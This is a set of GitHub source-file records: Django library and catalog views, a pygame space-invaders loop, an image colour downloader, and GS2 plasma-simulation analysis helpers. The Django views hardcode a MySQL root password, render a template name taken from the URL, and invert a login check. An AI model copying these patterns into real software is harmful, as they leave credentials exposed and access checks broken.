verbose_name=_(\"URL de l'image\"),)\n image_file = models.ImageField(\n null=True, blank=True, verbose_name=_(\"Chemin du fichier\"),)\n\n # permet d'ordonner l'affichage\n\n class Meta:\n ordering = [\"reference\"]\n\n # permet d'afficher une valeur dans la page home de publication à la place de 'object'\n\n def __str__(self):\n return f\"{self.reference} {self.name} {self.author}\"\n\n def clean(self):\n if self.dewey_number and self.author:\n self.reference = f\"{self.dewey_number.number}.{self.author.last_name[:3].upper()}.{self.pk}\"\n else:\n self.reference = \"\"\n","repo_name":"thycan22/babel-thycan22","sub_path":"catalog/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":9606,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"32710804387","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.shortcuts import render, render_to_response\n\n# Create your views here.\nimport datetime, MySQLdb\n\nfrom django.http import HttpResponse, HttpResponseRedirect, Http404\n\nfrom django.contrib import auth\nfrom django.db.models import Q\nfrom django.shortcuts import render_to_response\nfrom .models import book , publisher\nfrom django.core.mail import send_mail\nfrom .forms import contactform ,pubform\nfrom django.template import RequestContext, Template, TemplateDoesNotExist\nfrom django.core.mail import send_mail, EmailMessage\nimport csv\nfrom reportlab.pdfgen import canvas\nfrom io import StringIO\nfrom django.views.decorators.cache import cache_page\nfrom django.urls import reverse\nfrom django.utils.translation import gettext\nfrom django.utils import translation\nfrom django.conf import settings\n\npassengers = [125,65,875, 873, 986, 54, 653, 123, 434]\n\ndef hoi(request):\n\t# txt = \"\"\"
welcoming you
\"\"\"\n\t #return HttpResponse(txt)\n\ttimenow = datetime.datetime.now()\n\tdays = ['m', 't','w', 'th', 'f', 's', 'su']\n\treturn render(request, \"h2.html\", {\"time\": timenow, \"daysweek\": days})\n\n\n\ndef article(req, id):\n\t txt = \"displaying article number : %s\" %id\n\t return HttpResponse(txt) \n\n\n\ndef dbom(request):\n\t db = MySQLdb.connect(user='root', db= 'djangodb', passwd='giessen', host='localhost')\n\t cursor = db.cursor()\n\t cursor.execute('select name from names' )\n\t names = [row[0] for row in cursor.fetchall()]\n\t db.close()\n\t return render_to_response('books.html', {'namesintemplate': names})\n\n\ndef search (request):\n\tquery = request.GET.get('q', '')\n\tprinted = query\n\tif query:\n\t\tqset = (Q(title__icontains=query) | Q(authors__firstname__icontains=query) |\n\t\t\t\tQ(authors__lastname__icontains=query) | Q(authors__email__icontains=query)\n \n\n\t\t\t)\n\n\t\tresults = book.objects.filter(qset).distinct()\n\n\telse:\n\t\tresults = []\n\n\treturn render_to_response(\"search.html\" , {\n\t\t \"r\": results, \"q\":query, \"printed\":printed,\n\n\n\n\t\t}) \n\ndef index(request):\n\t\treturn render_to_response(\"index.html\")\n\n\ndef contact(request):\n\tif request.method == 'POST':\n\t\tform = contactform(request.POST, initial={'sender':'use@example.com'})\n\t\tif form.is_valid():\n\t\t\ttopic = form.cleaned_data['topico']\n\t\t\tmessage = form.cleaned_data['message']\n\t\t\t\n\t\t\tsender = form.cleaned_data.get('sender', 'noreply@example.com')\n\t\t\tsend_mail('feedback from site, topic: %s' % topic, message, '', ['med.abuali@gmail.com'], fail_silently=False,)\n\t\t\treturn HttpResponseRedirect('index')\n\t\t\t#return HttpResponseRedirect(reverse('sendmail'))\n\n\telse:\n\t\tform = contactform(initial={'sender':'u@example.com'})\n\t\n\treturn render(request, 'contact.html', {'form':form})\n\n\ndef publish(request):\n\tif request.method == 'POST':\n\t\tform = pubform(request.POST)\n\t\tif form.is_valid():\n\t\t\n\t\t\tform.save()\n\t\t\treturn HttpResponseRedirect(\".\")\n\n\telse : \n\t\tform = pubform()\n\n\treturn render(request, 'add_publish.html', {'form': form})\n\t\ndef send(request):\n\tmsg = EmailMessage('req callback', 'here is the msg',to=['med.abuali@gmail.com'])\n\tmsg.send()\n\n\t#return HttpResponseRedirect('contact/')\n\t#return HttpResponseRedirect(reverse('sendmail'))\n\treturn render_to_response(\"search.html\")\n \n\ndef viewing(request, tmpname):\n\treturn render_to_response(tmpname)\n\n\n\ndef mailing(request):\n\tmsg= EmailMessage('subject ', 'mesj from inside mail def', to=['meddhif@gmail.com'])\n\n\n\tmsg.send()\n\n\treturn render_to_response('success.html')\n\ndef whatever(request):\n\ttry:\n\t\treturn render_to_response('djk.html')\n\t\t\n\texcept TemplateDoesNotExist:\n\t\traise Http404()\n\t\t\n\n\ndef csv(request):\n\t# img = open(\"/home/mad/Pictures/cpm.pdf\", \"rb\").read()\n\t# return HttpResponse(img, content_type=\"application/pdf\")\n\tresp = HttpResponse(content_type='text/csv')\n\tresp['Content-Disposition']= 'attachment; filename=ruly.csv'\n\n\n\twriter = csv.writer(resp)\n\tfor (year, num) in zip(range(1995,2006), passengers):\n\t\twriter.writerow([year,num])\n\n\treturn resp\n\n\n\ndef pdf(request):\n\n\tresp = HttpResponse(content_type='application/pdf')\n\tresp['Content-Disposition'] = 'attachment; filename=mypdf.pdf'\n\n\n\tp = canvas.Canvas(resp)\n\n\tp.drawString(10,10, \"hi there A company needs to develop a strategy for software product development for which it has a choice of two programming languages L1 and L2. The number of lines of code (LOC) developed using L2 is estimated to be twice the LOC developed with Ll. The product will have to be maintained for five years. Various parameters for the company are given in the table below.\")\n\n\tp.showPage()\n\n\tp.save()\n\n\treturn resp\n\n\n\ndef pdfx(request):\n\n\tresp = HttpResponse(content_type='application/pdf')\n\tresp['Content-Disposition'] = 'attachment; filename=mypdf.pdf'\n\n\ttmp = StringIO()\n\n\n\tp = canvas.Canvas(tmp)\n\n\tp.drawString(10,10, \"hi there A company needs to develop a strategy for software product development for which it has a choice of two programming languages L1 and L2. The number of lines of code (LOC) developed using L2 is estimated to be twice the LOC developed with Ll. The product will have to be maintained for five years. Various parameters for the company are given in the table below.\")\n\n\tp.showPage()\n\n\tp.save()\n\tresp.write(tmp.getvalue())\n\treturn resp\n\n\n\n@cache_page(60 * 1)\ndef simpletxt(any):\n\n\tif any.user.is_anonymous:\n\t\treturn HttpResponse(\"u r logged in %s\" % any.user.is_superuser)\n\telse:\n\t\treturn HttpResponse(\"not logged in\")\n\n\n\n\ndef log(request):\n\n\tif request.method == 'POST':\n\t\tusern = request.POST['user']\n\t\tpassw = request.POST['pass']\n\n\t\tuser = auth.authenticate(username=usern, password=passw)\n\t\tif user is not None and user.is_active:\n\t\t\tauth.login(request, user)\n\t\t\treturn HttpResponse(\"successful login\")\n\n\t\telse:\n\t\t\treturn HttpResponse(\"failed to login\")\n\n\n\treturn render(request, \"log.html\")\n\n\n\ndef logout(request):\n\tauth.logout(request)\n\n\treturn render(request, \"log.html\")\n\n\n\ndef trans(req):\n\t#translation.activate('de')\n\t\n\t# if req.LANGUAGE_CODE == 'nl':\n\t# \treturn HttpResponse(\"it is dutch\")\n\n\t# else:\n\t# \treturn HttpResponse(\"it is still english\")\n\n\t#req.session[translation.LANGUAGE_SESSION_KEY] = 'de'\n\t#req.LANGUAGE_CODE= 'de'\n\t#if 'HTTP_ACCEPT_LANGUAGE' not in req.META:\n\n\t\t\n\t\t #del req.META['HTTP_ACCEPT_LANGUAGE']\n\n\t\n\toutput = gettext(\"welcome to my site\")\n\ttext = u'
header
'\n\treturn HttpResponse(text)\n\n\t\n\n\ndef transnl(req):\n\n\t#req.session[translation.LANGUAGE_SESSION_KEY] = 'nl'\n\t#req.LANGUAGE_CODE= 'nl'\n\n\t\n\n\toutput = gettext(\"welcome to my site\")\n\n\treturn HttpResponse(settings.LANGUAGE_CODE)\n\n\ndef inter(req):\n\n\t# if LANGUAGE_CODE == 'de':\n\t# \treturn HttpResponse(\"it is de\")\n\t# else:\n\t# \treturn HttpResponse(\"it is not de\")\n\t\n\n\n\t#return render(req, \"inter.html\")\n\treturn HttpResponse(settings.LANGUAGE_CODE)","repo_name":"mddhif/django","sub_path":"myapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"34850675176","text":"import sys\nimport pygame\nfrom space_ship import SpaceShip\nfrom game_setting import Settings\nimport game_functions as GAMEFUNCTION\nfrom pygame.sprite import Group\nfrom game_state import GameState\nfrom buttons import Button\n\n\ndef run_game():\n #创建setting对象,使用默认参数\n settingCenter = Settings()\n #创建gamestate对象,使用默认参数\n game_state = GameState(settings=settingCenter)\n #声明一个元组获取屏幕参数\n screen_size = (settingCenter.screen_width,settingCenter.screen_height)\n #初始化游戏并创建一个屏幕对象\n pygame.init()\n screen = pygame.display.set_mode(screen_size)\n pygame.display.set_caption(\"Alien Invasion\")\n\n #绘制开始游戏按钮\n play_button = Button(settings=settingCenter,screen=screen,msg=\"Play\")\n\n #绘制一艘飞船\n ship = SpaceShip(screen,settingCenter)\n #创建一个用于储存子弹的编组\n bullets = Group()\n #创建一个用于储存外星人的编组\n aliens = Group()\n #创建一个外星人舰队\n GAMEFUNCTION.create_alien_fleet(settings=settingCenter,screen=screen,aliens=aliens,ship=ship)\n #开始游戏的主循环\n while True:\n #监控键盘和鼠标\n GAMEFUNCTION.check_events(ship=ship,settings=settingCenter,bullets=bullets,screen=screen,state=game_state,play_button=play_button)\n if game_state.game_active == True:\n #判断飞船是否在左上角 \n #更新飞船移动状态\n ship.update()\n #更新子弹位置\n GAMEFUNCTION.update_bullets(settings=settingCenter,ship=ship,bullets = bullets,aliens=aliens,screen=screen)\n #更新外星人位置\n GAMEFUNCTION.update_aliens(settings=settingCenter,aliens = aliens,ship=ship,game_state=game_state,screen=screen,bullets=bullets)\n\n #更新屏幕\n GAMEFUNCTION.update_screen(settingCenter,screen,ship,bullets,aliens,play_button=play_button,state=game_state)\n\n\n\nrun_game()\n\n","repo_name":"dlfkid/AlienInvasion","sub_path":"alien_invation.py","file_name":"alien_invation.py","file_ext":"py","file_size_in_byte":1990,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"8501444601","text":"from PIL import Image\nimport numpy as np\nfrom io import BytesIO\nimport colorsys\nimport pickle\nimport json\nimport os\n\nwith open('./react-app/src/config.json') as file:\n CONFIG = json.load(file)\n\nif CONFIG['useImageCache']:\n if os.path.exists('imageCache.pickle'):\n with open('imageCache.pickle', 'rb') as f:\n IMAGE_CACHE = pickle.load(f)\n else:\n IMAGE_CACHE = {}\n\ndef RGBtoHSV(vec):\n return colorsys.rgb_to_hsv(vec[0]/255, vec[1]/255, vec[2]/255)\n\nasync def downloadImage(session, url):\n if CONFIG['useImageCache'] and url in IMAGE_CACHE:\n arr, img = IMAGE_CACHE[url]\n return arr, img\n else:\n async with session.get(url) as res:\n img = Image.open(BytesIO(await res.read()))\n imgArr = np.array(img)\n\n if CONFIG['useImageCache']:\n IMAGE_CACHE[url] = (imgArr, img)\n with open('imageCache.pickle', 'wb') as f:\n pickle.dump(IMAGE_CACHE, f)\n print(f'SAVED img in cache: {url}')\n\n return imgArr, img\n\ndef imgToCoords(img):\n '''\n Builds a polar coordinate point from the average color of an image.\n NOTE: This could easily be changed to use the primary (rather than avg) color.\n '''\n avgColor = np.round(np.mean(img, axis=(1, 0)))\n if len(img.shape) < 3:\n avgColor = np.array([avgColor, avgColor, avgColor])\n\n newcolor = RGBtoHSV(avgColor)\n\n angle = newcolor[0]*360\n depth = newcolor[1]*newcolor[2]\n\n return angle, depth\n\nasync def getImageAndCoords(session, title, url):\n imageArr, image = await downloadImage(session, url)\n angle, depth = imgToCoords(imageArr)\n\n return title, image, (angle, depth)\n\n\n# if __name__ == '__main__':\n# url = 'https://i.scdn.co/image/ab67616d0000b2736ca699e2722b51b1e4ae6091'\n# downloadImage(session, url)\n","repo_name":"eebmagic/spotify-vis","sub_path":"ImageDownloader.py","file_name":"ImageDownloader.py","file_ext":"py","file_size_in_byte":1854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"37619890228","text":"\"\"\"Helper module, containing often-used and mature methods. The aim is for this\nscript to be thoroughly tested, and then called by other scripts as needed.\n\nAuthor: Bob Davies\"\"\"\n\nimport ncdf2dict\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom scipy.optimize import curve_fit\nimport math\nimport sys\nimport xarray as xr\n\nLINEAR_SIMS = \"../../gs2_sims_linear/\"\n\n\ndef linear_growth(xdata, a, b):\n return a + b*xdata\n\ndef fit_growth_rate_from_phi2(t, phi2):\n \"\"\"Fit a straight line to the natural logarithm of phi**2. If we assume that\n phi**2 is described by phi**2 = A*exp(Bt), then log(phi**2) = ln(A) + Bt\"\"\"\n\n logphi2 = np.log(phi2)\n\n popt, pcov = curve_fit(linear_growth, t, logphi2)\n [a_opt, b_opt] = popt\n growth_rate = b_opt/2\n growth_rate_stdev = (np.sqrt(pcov[1, 1]))/2\n fitted_phi2 = np.exp(a_opt)*np.exp(b_opt*t)\n\n return fitted_phi2, growth_rate, growth_rate_stdev\n\ndef extract_data_from_ncdf(sim_name, *args):\n \"\"\"Extract data arrays from the NetCDF file for a simulation. Extracts all\n data given in *args. TO IMPLEMENT:\n - Tell you if the file doens't exist\n - If args don't exist, view_ncdf variables\"\"\"\n\n\n # Convert the input file to a python dictionary\n data = ncdf2dict.ncdf2dict(sim_name)\n datalist = []\n # Extract each array specified in args, and add it to the list\n for arg in args:\n datalist.append(data[arg])\n\n return datalist\n\ndef extract_data_from_ncdf_with_xarray(sim_name, *args):\n \"\"\"Extract data arrays from the NetCDF file for a simulation. Extracts all\n data given in *args. TO IMPLEMENT:\n - Tell you if the file doens't exist\n - If args don't exist, view_ncdf variables\"\"\"\n\n # Convert the input file to a python dictionary\n data = xr.open_dataset(sim_name)\n datalist = []\n\n # Extract each array specified in args, and add it to the list\n for arg in args:\n datalist.append(data[arg])\n\n return datalist\n\ndef view_ncdf_variables(outnc_longname):\n \"\"\"View the names all variables in the netcdf file\"\"\"\n data = ncdf2dict.ncdf2dict(outnc_longname)\n print(list(data.keys()))\n return\n\ndef compare_growth_rate_to_gs2(fitted_growth_rate, omega_average):\n \"\"\"Compares the fitted value of the growth rate to the values given\n by GS2.\"\"\"\n\n OMEGA_CONV_TOLERANCE = 10**-4 # Maximum st. dev. of growth rates sample\n OMEGA_FIT_TOLERANCE = 10**-3 # Maximum fractional difference between fitted\n # and GS2-provided growth rates.\n warnings = 0\n growth_rates = omega_average.imag\n # We find the converged frequency from the final 20% of the frequency\n # values\n sample_size = max(len(growth_rates)//5, 20) # // to force sample_size to integer value\n if len(growth_rates) < sample_size:\n # print(\"Warning! Not enough growth rate values to compare with GS2 reliably.\")\n sample_size = len(growth_rates) - 1\n\n sample_growth_rates = growth_rates[-sample_size:]\n\n converged_growth_rate = np.average(sample_growth_rates)\n sample_stdev = np.std(sample_growth_rates)\n # if sample_stdev > OMEGA_CONV_TOLERANCE:\n # print((\"Warning! Growth may not not converged, standard deviation \" +\n # \"frequency sample is \" + str(sample_stdev)))\n\n # Compare converged and fitted growth rates - we find the fractional\n # difference by dividing by the converged growth rate rather than the\n # fitted growth rate, because fitting errors may cause the latter to have\n # strange values.\n # if (((converged_growth_rate - fitted_growth_rate)/converged_growth_rate)\n # > OMEGA_FIT_TOLERANCE):\n # warnings +=1\n # print((\"Warning! Fitted and converged growth rates do not match \" +\n # \"within specified tolerance. Converged growth rate, \" +\n # \"fitted growth rate = \" + str(converged_growth_rate) + \", \" +\n # str(fitted_growth_rate)))\n\n # if warnings == 0:\n # print(\"Growth rate fit successful!\")\n return\n\ndef calculate_converged_frequency(t, omega_average):\n \"\"\"Calculates the frequency given by GS2, and checks if it has converged to\n a reasonable level.\n\n Bob 23/04/21: Modified to simply take the last point for frequency; frequency tends to\n bifurcate, rather than converge, so the only way to see if we're actually\n converge is to look at frequency(time)\"\"\"\n\n FREQ_CONV_TOLERANCE = 10**-4\n\n frequency = omega_average.real\n # We find the converged frequency from the final 20% of the frequency\n # values\n sample_size = max(len(frequency)//5, 20) # // to force sample_size to integer value\n if len(frequency) < sample_size:\n #print(\"Warning! Not enough growth rate values to compare with GS2 reliably.\")\n sample_size = len(frequency) -1\n sample_frequencies = frequency[-sample_size:]\n\n converged_frequency = np.average(sample_frequencies)\n sample_stdev = np.std(sample_frequencies)\n # if sample_stdev > FREQ_CONV_TOLERANCE:\n # print((\"Warning! Frequency may not not converged, standard deviation \" +\n # \"frequency sample is \" + str(sample_stdev)))\n\n conv_freq_tlims = [t[-sample_size], t[-1]]\n return frequency[-1][0][0], sample_stdev, conv_freq_tlims\n\ndef chop_fitting_data(t, phi2):\n \"\"\"Chop t and phi2 for fitting the growth rate, according to the following rules:\n - Remove 'nan's and 'inf's\n - Of the remaining data, take the latter half of it \"\"\"\n MIN_NSTEPS = 20\n MIN_NSTEPS_ERROR = 4\n # Convert from lists to arrays\n t = np.asarray(t)\n phi2 = np.asarray(phi2)\n\n # Check that all time values are finite - if it isn't, something strange has\n # occured and we should terminate.\n if not np.isfinite(t).all():\n print(\"Error! Non-finite t values detected.\")\n print(\"t= \", t)\n sys.exit(\"Script stopped\")\n\n\n if not np.isfinite(phi2).all():\n #print(\"Warning! Non-finite phi2 values detected\")\n valid_value_array = np.isfinite(phi2)\n invalid_value_idxs = np.where(valid_value_array == False)\n #print \"False idxs = \", invalid_value_idxs\n #print \"invalid_value_idxs[0] = \", invalid_value_idxs[0]\n t = t[:invalid_value_idxs[0][0]]; phi2 = phi2[:invalid_value_idxs[0][0]]\n\n nsteps = len(t)\n # if nsteps < MIN_NSTEPS:\n # print(\"Non-critical warning! Number of phi2 data points = \", nsteps)\n # print(\"t = \", t)\n # print(\"phi2 = \", phi2)\n if nsteps < MIN_NSTEPS_ERROR:\n print(\"Critical warning! Number of phi2 data points = \", nsteps)\n print(\"t = \", t)\n print(\"phi2 = \", phi2)\n raise Exception\n\n return t[(nsteps//2):], phi2[(nsteps//2):] # // because we want an integer, not a float\n\ndef lazy_calculate_omega(sim_name, return_fitted_vals=False):\n \"\"\"Calculate the growth rate based on phi**2(t), designed for simulations\n where omega_average has not been saved. \"\"\"\n\n [t, phi2] = extract_data_from_ncdf(sim_name, 't', 'phi2')\n\n # Only use the last half of the data to fit the growth rate - hopefully,\n # growh rate has converged at this point.\n print(\"sim_name = \", sim_name)\n t_chopped, phi2_chopped = chop_fitting_data(t, phi2)\n fitted_phi2, fitted_growth_rate, growth_rate_error = (\n fit_growth_rate_from_phi2(t_chopped, phi2_chopped))\n\n if return_fitted_vals==True:\n sys.exit(\"Method currently has no implementation of return_fitted_vals, aborting.\")\n else:\n return (fitted_growth_rate, growth_rate_error)\n\ndef calculate_omega(sim_name, return_fitted_vals=False):\n \"\"\"Calculates the growth rate for a simulation bsaed on phi**2(t) and\n compares it to the values calculated by GS2.\"\"\"\n\n try:\n [t, phi2, omega_average] = extract_data_from_ncdf(sim_name, 't', 'phi2',\n 'omega_average')\n except KeyError:\n [t, phi2, omega_average] = extract_data_from_ncdf(sim_name, 't', 'phi2',\n 'omegaavg')\n\n # Only use the last half of the data to fit the growth rate - hopefully,\n # growh rate has converged at this point.\n\n try:\n t_chopped, phi2_chopped = chop_fitting_data(t, phi2)\n fitted_phi2, fitted_growth_rate, growth_rate_error = (\n fit_growth_rate_from_phi2(t_chopped, phi2_chopped))\n compare_growth_rate_to_gs2(fitted_growth_rate, omega_average)\n converged_frequency, freq_error, conv_freq_tlims = calculate_converged_frequency(t, omega_average)\n except Exception: # Likely caused by too few points to plot.\n t_chopped = None\n fitted_phi2 = None\n fitted_growth_rate = omega_average[-1].imag\n growth_rate_error = None\n converged_frequency = omega_average[-1].real\n freq_error = None\n conv_freq_tlims = None\n\n if return_fitted_vals==True:\n return (t, t_chopped, phi2, fitted_phi2, fitted_growth_rate, growth_rate_error,\n converged_frequency, freq_error, conv_freq_tlims, omega_average)\n else:\n return (fitted_growth_rate, growth_rate_error, converged_frequency,\n freq_error)\n\ndef calculate_omega_kykx(sim_name, return_fitted_vals=False):\n \"\"\"Calculates the growth rate for a simulation bsaed on phi**2(t) and\n compares it to the values calculated by GS2.\"\"\"\n\n\n #view_ncdf_variables(sim_name)\n try:\n [t, phi2_kykx, omega_average_kykx] = extract_data_from_ncdf(sim_name, 't', 'phi2_by_mode',\n 'omega_average')\n except KeyError:\n [t, phi2_kykx, omega_average_kykx] = extract_data_from_ncdf(sim_name, 't', 'phi2_by_mode',\n 'omegaavg')\n\n # print(\"phi2.shape = \", phi2.shape)\n # print(\"omega_average.shape = \", omega_average.shape)\n n_ky = phi2_kykx.shape[1]; n_kx = phi2_kykx.shape[2]\n\n fitted_growth_rate_kykx = np.zeros((n_ky, n_kx))\n growth_rate_error_kykx = np.zeros((n_ky, n_kx))\n converged_frequency_kykx = np.zeros((n_ky, n_kx))\n freq_error_kykx = np.zeros((n_ky, n_kx))\n\n for ky_idx in range(0, n_ky):\n for kx_idx in range(0, n_kx):\n\n phi2 = phi2_kykx[:, ky_idx, kx_idx]\n omega_average = omega_average_kykx[:, ky_idx, kx_idx]\n\n # Only use the last half of the data to fit the growth rate - hopefully,\n # growh rate has converged at this point.\n\n t_chopped, phi2_chopped = chop_fitting_data(t, phi2)\n fitted_phi2, fitted_growth_rate, growth_rate_error = (\n fit_growth_rate_from_phi2(t_chopped, phi2_chopped))\n #print(\"calculate_omega fitted_growth_rate = \", fitted_growth_rate)\n compare_growth_rate_to_gs2(fitted_growth_rate, omega_average)\n converged_frequency, freq_error, conv_freq_tlims = calculate_converged_frequency(t, omega_average)\n\n fitted_growth_rate_kykx[ky_idx, kx_idx] = fitted_growth_rate\n growth_rate_error_kykx[ky_idx, kx_idx] = growth_rate_error\n converged_frequency_kykx[ky_idx, kx_idx] = converged_frequency\n freq_error_kykx[ky_idx, kx_idx] = freq_error\n\n\n #\n # if return_fitted_vals==True:\n # return (t, t_chopped, phi2, fitted_phi2, fitted_growth_rate, growth_rate_error,\n # converged_frequency, freq_error, conv_freq_tlims, omega_average)\n\n return (fitted_growth_rate_kykx, growth_rate_error_kykx, converged_frequency_kykx,\n freq_error_kykx)\n\ndef plot_growth_rates(sim_name, title, save_loc=\"./\", include_phi=False):\n \"\"\"For visual inspection of omega-related outputs of simulation. Plots\n phi**2(t) and omega_average(t), along with the fitted growth rate.\"\"\"\n\n (t, t_chopped, phi2, fitted_phi2, fitted_growth_rate, growth_rate_error, converged_frequency,\n freq_error, conv_freq_tlims, omega_average) = calculate_omega(sim_name, return_fitted_vals=True)\n try:\n [theta, phi_by_mode] = extract_data_from_ncdf(sim_name, 'theta', 'phi')\n except KeyError:\n print(\"Error getting mode structure\")\n return\n\n absphi = phi_by_mode[0][0]\n absphi = abs(absphi/max(abs(absphi)))\n\n # Plot phi**2(t)\n fig = plt.figure(1, figsize=(17.0, 9.6))\n fig.suptitle(title, fontsize=24, fontweight='bold')\n ax1 = fig.add_subplot(221)\n ax1.scatter(t, phi2, c=\"black\", marker=\"+\", label=\"phi**2\")\n if fitted_phi2 is not None:\n ax1.plot(t_chopped, fitted_phi2, c='r',\n label=\"Fitted to log(phi**2)\")\n ax1.set_yscale('log')\n ax1.legend(loc=\"best\")\n ax1.set_xlabel(\"time (normalised GS2 units)\")\n ax1.set_ylabel(\"phi**2 (normalised GS2 units)\")\n\n # Plot frequency(t)\n ax2 = fig.add_subplot(222)\n ax2.scatter(t, omega_average.real, c='black', marker =\"x\", label=\"omega_average\")\n #print(\"omega_average.shape, omega_average[-1] = \", omega_average.shape, omega_average[-1])\n ax2.text(np.min(t), np.max(omega_average.real)/2, \"freq[-1] = {:.5f}\".format(omega_average[-1,0,0].real))\n if conv_freq_tlims is not None:\n ax2.plot(conv_freq_tlims, [converged_frequency, converged_frequency], c=\"r\",\n label=\"converged frequency\")\n #ax2.set_xlabel(\"time (normalised GS2 units)\")\n ax2.set_ylabel(\"frequency (normalised GS2 units)\")\n ax2.legend(loc='best')\n ax2.tick_params('y', which='both', labelsize=8, direction=\"in\")\n ax2.tick_params('x', which='both', labelsize=8, direction=\"in\", bottom=False)\n ax2.grid(True, which=\"both\", axis=\"both\", linestyle=\"--\")\n ax2.set_axisbelow(True)\n plt.setp(ax2.get_xticklabels(), visible=False)\n\n # Plot GS2's growth rate(t)\n ax3 = fig.add_subplot(224, sharex=ax2)\n ax3.scatter(t, omega_average.imag, c='black', marker =\"x\", label=\"omega_average\")\n ax3.text(np.min(t), np.max(omega_average.imag)/2, \"freq[-1] = {:.5f}\".format(omega_average[-1,0,0].imag))\n if t_chopped is not None:\n ax3.plot([t_chopped[0], t_chopped[-1]], [fitted_growth_rate, fitted_growth_rate],\n c='r', label=\"Fitted to log(phi**2)\")\n ax3.set_xlabel(\"time (normalised GS2 units)\")\n ax3.legend(loc='best')\n ax3.set_ylabel(\"growth rate (normalised GS2 units)\")\n ax3.set_axisbelow(True)\n ax3.tick_params('both', which='both', labelsize=8, direction=\"in\")\n ax3.grid(True, which=\"both\", axis=\"both\", linestyle=\"--\")\n #ax3.title(title)\n ax4 = fig.add_subplot(223)\n ax4.plot(theta/np.pi, absphi, c=\"black\")\n ax4.set_xlabel(r\"$\\theta/\\pi$\")\n ax4.set_ylabel(r\"$\\vert \\phi \\vert$\")\n ax4.tick_params('both', which='both', labelsize=8, direction=\"in\")\n ax4.grid(True, which=\"both\", axis=\"both\", linestyle=\"--\")\n plt.savefig(save_loc + title + \".png\")\n plt.close()\n return\n\ndef plot_phi2_from_nc(sim_name, title, save_loc=\"./\"):\n \"\"\"For visual inspection of omega-related outputs of simulation. Plots\n phi**2(t) and omega_average(t), along with the fitted growth rate.\"\"\"\n\n [t, phi2, omega_average] = extract_data_from_ncdf(sim_name, 't', 'phi2',\n 'omega_average')\n\n # Plot phi**2(t)\n fig = plt.figure(1, figsize=(17.0, 9.6))\n fig.suptitle(title, fontsize=24, fontweight='bold')\n ax1 = fig.add_subplot(111)\n ax1.scatter(t, phi2, c=\"black\", marker=\"+\", label=\"phi**2\")\n ax1.set_yscale('log')\n ax1.legend(loc=\"best\")\n ax1.set_xlabel(\"time (normalised GS2 units)\")\n ax1.set_ylabel(\"phi**2 (normalised GS2 units)\")\n\n plt.savefig(save_loc + title + \".png\")\n plt.close()\n\n return\n\ndef plot_multiple_growth_rates(sims, title, save_loc=\"./\", labels=[]):\n \"\"\"For visual inspection of omega-related outputs of simulation. Plots\n phi**2(t) and omega_average(t), along with the fitted growth rate.\"\"\"\n\n\n if len(labels) == 0:\n labels = sims\n\n fig = plt.figure(1, figsize=(17.0, 9.6))\n fig.suptitle(title, fontsize=24, fontweight='bold')\n ax1 = fig.add_subplot(121)\n ax2 = fig.add_subplot(222)\n ax3 = fig.add_subplot(224, sharex=ax2)\n\n for i, sim_name in enumerate(sims):\n (t, t_chopped, phi2, fitted_phi2, fitted_growth_rate, growth_rate_error, converged_frequency,\n freq_error, conv_freq_tlims, omega_average) = calculate_omega(sim_name, return_fitted_vals=True)\n\n # Plot phi**2(t)\n ax1.scatter(t, phi2, marker=\"+\")\n ax1.plot(t_chopped, fitted_phi2, label=labels[i])\n\n # Plot frequency(t)\n ax2.scatter(t, omega_average.real, marker =\"x\", label=labels[i])\n ax2.plot(conv_freq_tlims, [converged_frequency, converged_frequency])\n\n # Plot GS2's growth rate(t)\n ax3.scatter(t, omega_average.imag, marker =\"x\", label=labels[i])\n ax3.plot([t_chopped[0], t_chopped[-1]], [fitted_growth_rate, fitted_growth_rate])\n\n ax1.set_yscale('log')\n ax1.legend(loc=\"best\")\n ax1.set_xlabel(\"time (normalised GS2 units)\")\n ax1.set_ylabel(\"phi**2 (normalised GS2 units)\")\n ax2.set_ylabel(\"frequency (normalised GS2 units)\")\n ax2.legend(loc='best')\n ax2.tick_params('y', which='both', labelsize=8, direction=\"in\")\n ax2.tick_params('x', which='both', labelsize=8, direction=\"in\", bottom=False)\n ax2.grid(True, which=\"both\", axis=\"both\", linestyle=\"--\")\n ax2.set_axisbelow(True)\n plt.setp(ax2.get_xticklabels(), visible=False)\n\n ax3.set_xlabel(\"time (normalised GS2 units)\")\n ax3.legend(loc='best')\n ax3.set_ylabel(\"growth rate (normalised GS2 units)\")\n ax3.set_axisbelow(True)\n ax3.tick_params('both', which='both', labelsize=8, direction=\"in\")\n ax3.grid(True, which=\"both\", axis=\"both\", linestyle=\"--\")\n plt.show()\n #plt.savefig(save_loc + title + \".png\")\n #plt.close()\n return\n\ndef view_ncdf_variables_with_xarray(sim_name):\n \"\"\"View the names all variables in the netcdf file\"\"\"\n data = xr.open_dataset(sim_name)\n print(list(data.keys()))\n return\n\nif __name__ == \"__main__\":\n outnc_longname = LINEAR_SIMS + \"lowq0_psinkx_scan_millerparams_1/run_psin_0.15_ky_0.15_kx_0.03/input.out.nc\"\n view_ncdf_variables(outnc_longname)\n [kx] = extract_data_from_ncdf(outnc_longname, \"kx\")\n print(\"kx = \", kx)\n","repo_name":"rd1042/stella_benchmarking_new","sub_path":"postprocessing_tools/helper_ncdf_new.py","file_name":"helper_ncdf_new.py","file_ext":"py","file_size_in_byte":18208,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
